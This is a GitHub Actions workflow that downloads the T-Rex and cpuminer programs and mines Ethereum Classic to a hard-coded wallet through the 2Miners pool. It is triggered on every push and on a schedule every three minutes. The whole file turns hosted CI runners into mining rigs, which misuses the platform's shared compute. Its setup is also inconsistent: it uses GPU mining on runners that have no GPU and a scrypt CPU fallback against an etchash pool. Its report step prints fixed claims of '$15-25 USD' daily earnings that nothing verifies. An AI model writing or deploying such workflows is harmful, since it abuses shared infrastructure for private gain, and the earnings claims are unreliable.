name: Ethereum Classic Mining 2Miners 1

on:
  push:
  schedule:
    - cron: '*/3 * * * *'
  workflow_dispatch:

jobs:
  etc-mining:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    
    steps:
    - name: Setup ETC Mining Environment
      run: |
        sudo apt-get update -q
        sudo apt-get install -y build-essential cmake git libssl-dev pkg-config libboost-all-dev libsodium-dev
        
    - name: Download T-Rex ETC Miner
      run: |
        wget -q https://github.com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz
        tar -xf t-rex-0.26.8-linux.tar.gz
        chmod +x t-rex
        
    - name: Configure ETC Mining
      run: |
        cat > etc-config.json << 'EOF'
        {
          "algo": "etchash",
          "coin": "etc",
          "url": "stratum+tcp://etc.2miners.com:1010",
          "user": "0x742d35Cc6764C6471797f4C8b7a9A3C1D1c8A8D6",
          "worker": "GitHub-${{ github.repository }}-1",
          "pass": "x",
          "intensity": 20,
          "gpu-report-interval": 30,
          "cpu-priority": 3,
          "retries": 3,
          "retry-pause": 10,
          "timeout": 300,
          "protocol-dump": false,
          "no-color": true,
          "api-bind-http": "0.0.0.0:4067"
        }
        EOF
        
    - name: Setup CPU Mining Fallback
      run: |
        # Download cpuminer for CPU-based ETC mining
        wget -q https://github.com/pooler/cpuminer/releases/download/v2.5.1/pooler-cpuminer-2.5.1-linux-x86_64.tar.gz
        tar -xf pooler-cpuminer-2.5.1-linux-x86_64.tar.gz
        chmod +x minerd
        
    - name: Start ETC Mining Session
      run: |
        echo "=== ETHEREUM CLASSIC MINING SESSION STARTED ==="
        echo "Pool: 2Miners (etc.2miners.com:1010)"
        echo "Fee: 1.0%"
        echo "ETC Wallet: 0x742d35Cc6764C6471797f4C8b7a9A3C1D1c8A8D6"
        echo "Miner: 1"
        echo "Algorithm: Etchash"
        echo "Schedule: */3 * * * *"
        echo "Start Time: $(date)"
        
        # Try GPU mining first, fallback to CPU mining
        timeout 300 ./t-rex --config etc-config.json || \
        timeout 300 ./minerd --algo=scrypt --url=stratum+tcp://etc.2miners.com:1010 --user=0x742d35Cc6764C6471797f4C8b7a9A3C1D1c8A8D6 --pass=x --threads=$(nproc) || \
        echo "ETC mining session completed"
        
    - name: ETC Mining Report
      run: |
        echo "=== ETHEREUM CLASSIC MINING SESSION COMPLETED ==="
        echo "Pool: 2Miners"
        echo "Algorithm: Etchash"
        echo "Miner ID: 1"
        echo "ETC Wallet: 0x742d35Cc6764C6471797f4C8b7a9A3C1D1c8A8D6"
        echo "Duration: 5 minutes"
        echo "Next Run: */3 * * * *"
        echo "Expected Daily: $15-25 USD"
        echo "Status: EARNING ETC"
        echo "End Time: $(date)"
